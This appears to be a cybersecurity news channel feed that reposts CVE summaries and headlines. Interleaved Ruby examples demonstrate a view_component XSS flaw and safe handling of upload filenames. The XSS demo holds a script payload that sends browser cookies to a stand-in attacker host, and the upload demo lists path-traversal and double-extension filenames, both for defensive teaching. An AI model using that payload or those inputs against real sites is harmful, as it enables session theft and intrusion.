🛡 Cybersecurity & Privacy 🛡 - News
26.3K subscribers
89.4K links
🗞 The finest daily news on cybersecurity and privacy.

🔔 Daily releases.

💻 Is your online life secure?

📩 lalilolalo.dev@gmail.com
‼️CVE-2023-50867‼️

Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the signupAction.php resource does not validate the characters received and they are sent unfiltered to the database.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2024-21625‼️

SideQuest is a place to get virtual reality applications for Oculus Quest. The SideQuest desktop application uses deep links with a custom protocol (sidequest) to trigger actions in the application from its web contents. Because, prior to version 0.10.35, the deep link URLs were not sanitized properly in all cases, a one-click remote code execution can be achieved in cases when a device is connected, the user is presented with a malicious link and clicks it from within the application. As of version 0.10.35, the custom protocol links within the electron application are now being parsed and sanitized properly.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2023-6551‼️

As a simple library, class.upload.php does not perform an in-depth check on uploaded files, allowing a stored XSS vulnerability when the default configuration is used. Developers must be aware of that fact and use extension whitelisting accompanied by forcing the server to always provide content-type based on the file extension. The README has been updated to include these guidelines.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2023-6270‼️

A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on struct net_device, and a use-after-free can be triggered by racing between the free on the struct and the access through the skbtxq global queue. This could lead to a denial of service condition or potential code execution.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2023-51154‼️

Jizhicms v2.5 was discovered to contain an arbitrary file download vulnerability via the component admin/c/PluginsController.php.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2023-51812‼️

Tenda AX3 v16.03.12.11 was discovered to contain a remote code execution (RCE) vulnerability via the list parameter at /goform/SetNetControlList.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2024-21636‼️

view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. Versions prior to 3.9.0 have a cross-site scripting vulnerability that has the potential to impact anyone rendering a component directly from a controller with the view_component gem. Note that only components that define a call method (i.e. instead of using a sidecar template) are affected. The return value of the call method is not sanitized and can include user-defined content. In addition, the return value of the output_postamble method is not sanitized, which can also lead to cross-site scripting issues. Version 3.9.0 has been released and fully mitigates both the call and the output_postamble vulnerabilities. As a workaround, sanitize the return value of call.

📖 Read more

Via "National Vulnerability Database"
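The `call`-method problem described above, as an added Ruby example that is not view_component's own code: a stand-in component whose `call` return value is written straight into the response body, beside a version that escapes the user-controlled fragment with `ERB::Util.html_escape`, which is what the advisory's "sanitize the return value of call" workaround amounts to. The class names, the simulated render step and the payload are constructed for this demo.

```ruby
require "erb"

# Stand-in for a view_component-style component whose rendered output is the
# return value of #call. Added illustration, not the gem's code: class names and
# the simulated render pipeline below are assumptions.
class UnsafeGreeting
  def initialize(name)
    @name = name
  end

  # Vulnerable pattern: the string returned by #call reaches the page as-is, so
  # a user-supplied name is injected straight into the HTML.
  def call
    "<p>Hello, #{@name}!</p>"
  end
end

class SafeGreeting
  include ERB::Util # provides html_escape

  def initialize(name)
    @name = name
  end

  # Hardened pattern: encode every user-controlled fragment before it becomes
  # part of the returned markup. The component's own literal tags stay intact;
  # only the untrusted value is escaped.
  def call
    "<p>Hello, #{html_escape(@name)}!</p>"
  end
end

# Simulates a controller rendering a component directly (render Component.new):
# the returned string is written into the response without further escaping,
# the condition the advisory describes for versions before 3.9.0.
def render_component(component)
  component.call
end

# Constructed attacker input: closes the paragraph and adds a script tag.
PAYLOAD = "</p><script>document.location='https://attacker.example/?c='+document.cookie</script>".freeze

def vulnerable_output
  render_component(UnsafeGreeting.new(PAYLOAD))
end

def hardened_output
  render_component(SafeGreeting.new(PAYLOAD))
end

# Crude check used to show the difference: does the rendered body contain a
# live <script> tag? (The template itself never emits one.)
def contains_script_tag?(html)
  html.match?(%r{<script\b}i)
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{vulnerable_output}"
  puts "hardened:   #{hardened_output}"
end
```

In a real Rails component the escaped string would be marked `html_safe` after escaping so the framework does not double-encode it; `ERB::Util` stands in for that step here so the example runs without Rails.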
‼️CVE-2024-0241‼️

encoded_id-rails versions before 1.0.0.beta2 are affected by an uncontrolled resource consumption vulnerability. A remote and unauthenticated attacker might cause a denial of service condition by sending an HTTP request with an extremely long "id" parameter.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2024-22047‼️

A race condition exists in Audited 4.0.0 to 5.3.3 that can allow an authenticated user to cause audit log entries to be attributed to another user.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2024-22048‼️

govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user's browser if a malicious search result is displayed on the search page.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2024-22049‼️

httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker-controlled filenames being written.

📖 Read more

Via "National Vulnerability Database"
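The class.upload.php item above (extension whitelisting, content-type derived from the extension) and the httparty item (a filename taken from a multipart/form-data part) come down to the same rule: the filename a client sends is untrusted input and must never decide where or under what type a file is stored. An added Ruby example, not code from either project; the allowlist, the upload directory and the sample filenames are assumptions for the demo:

```ruby
# Added example (not class.upload.php or httparty code): treating the filename
# carried in a multipart/form-data part as hostile input. The allowlist and the
# target directory are assumptions.
ALLOWED_TYPES = {
  "png"  => "image/png",
  "jpg"  => "image/jpeg",
  "jpeg" => "image/jpeg",
  "gif"  => "image/gif",
  "pdf"  => "application/pdf",
}.freeze

UPLOAD_DIR = "/var/www/uploads".freeze # assumed storage root

class RejectedUpload < StandardError; end

# Naive handling: trusts the client-supplied filename, so "../../etc/cron.d/job",
# "evil.html" or "shell.php.png" are all written under exactly that name.
def naive_target_path(client_filename)
  File.join(UPLOAD_DIR, client_filename)
end

# Hardened handling:
#  1. keep only the last path component, so directory traversal is impossible;
#  2. take the LAST extension only and require it to be on the allowlist, so a
#     double extension such as "shell.php.png" is stored as "shell_php.png";
#  3. reduce the stem to a conservative charset (this also strips CR/LF and
#     quotes, which would otherwise break a Content-Disposition header);
#  4. derive the Content-Type from the allowlisted extension, never from the
#     client-supplied header.
# Returns [target_path, content_type] or raises RejectedUpload.
def safe_upload_target(client_filename)
  raise RejectedUpload, "empty filename" if client_filename.nil? || client_filename.empty?

  # Normalise Windows separators too, then drop every directory component.
  base = File.basename(client_filename.tr("\\", "/"))
  raise RejectedUpload, "no usable name" if base.empty? || base == "." || base == ".."

  ext = File.extname(base).delete_prefix(".").downcase
  content_type = ALLOWED_TYPES[ext]
  raise RejectedUpload, "extension not allowed: #{ext.inspect}" if content_type.nil?

  stem = base[0...-(ext.length + 1)]
  stem = stem.gsub(/[^A-Za-z0-9_-]/, "_")
  stem = "upload" if stem.empty?
  stem = stem[0, 64] # bound the length; long names are a DoS vector of their own

  [File.join(UPLOAD_DIR, "#{stem}.#{ext}"), content_type]
end

if __FILE__ == $PROGRAM_NAME
  %w[photo.png ../../etc/passwd.png shell.php.png evil.html Report.PDF].each do |name|
    begin
      path, type = safe_upload_target(name)
      puts "#{name.inspect} -> #{path} (#{type})"
    rescue RejectedUpload => e
      puts "#{name.inspect} -> rejected: #{e.message}"
    end
  end
end
```

Serving the stored file with the content type looked up from `ALLOWED_TYPES`, rather than from whatever the client declared, is the second half of the class.upload.php guidance: an HTML payload renamed to `.png` then arrives at the browser as `image/png` and is not interpreted as a document.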
‼️CVE-2024-22050‼️

Path traversal in the static file service in Iodine less than 0.7.33 allows an unauthenticated, remote attacker to read files outside the public folder via malicious URLs.

📖 Read more

Via "National Vulnerability Database"
‼️CVE-2024-22051‼️

CommonMarker versions prior to 0.23.4 are at risk of an integer overflow vulnerability. This vulnerability can allow possibly unauthenticated remote attackers to cause heap memory corruption, potentially leading to an information leak or remote code execution, via parsing tables with marker rows that contain more than UINT16_MAX columns.

📖 Read more

Via "National Vulnerability Database"
πŸ‘1
πŸ–‹οΈ Exposed Secrets are Everywhere. Here's How to Tackle Them πŸ–‹οΈ

Picture this: you stumble upon a concealed secret within your company's source code. Instantly, a wave of panic hits as you grasp the possible consequences. This one hidden secret has the power to pave the way for unauthorized entry, data breaches, and a damaged reputation. Understanding the secret is just the beginning; swift and resolute action becomes imperative. However, lacking the

πŸ“– Read

via "The Hacker News".
πŸ–‹οΈ Orange Spain Faces BGP Traffic Hijack After RIPE Account Hacked by Malware πŸ–‹οΈ

Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials captured by means of stealer malware to hijack the border gateway protocol (BGP) traffic."The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers," the

πŸ“– Read

via "The Hacker News".
📔 23andMe Blames User “Negligence” for Data Breach 📔

A 23andMe letter sent to a legal firm representing victims of the data breach claims that users were at fault for recycling passwords

📖 Read

via "Infosecurity Magazine".
πŸ‘1
📢 Glasgow eyes goal of becoming Europe’s leading IoT city with launch of new innovation hub 📢

A new facility in Glasgow will support startups operating in the smart things space

📖 Read

via "ITPro".
📢 Intel poaches HPE exec Justin Hotard to lead its Data Center and AI Group 📢

Intel CEO Pat Gelsinger said Hotard boasts an "impressive track record" in driving data center innovation

📖 Read

via "ITPro".
📢 ICO fines topped $14 million in 2023 amid crackdown by regulator on data protection standards 📢

ICO fines across 2023 exceeded £14 million, with TikTok among the worst-hit for data protection violations

📖 Read

via "ITPro".
📔 NIST Fortifies Chatbots and Self-Driving Cars Against Digital Threats 📔

This effort is the first step in NIST’s broader mission to support the development of trustworthy AI

📖 Read

via "Infosecurity Magazine".
📢 Perplexity AI, a startup that just raised $73.6 million from Nvidia and Databricks, wants to take on Google's search engine dominance 📢

Perplexity AI looks to position itself as a challenger to Google in the search industry, but despite rapid growth in 2023 the odds could be stacked against it

📖 Read

via "ITPro".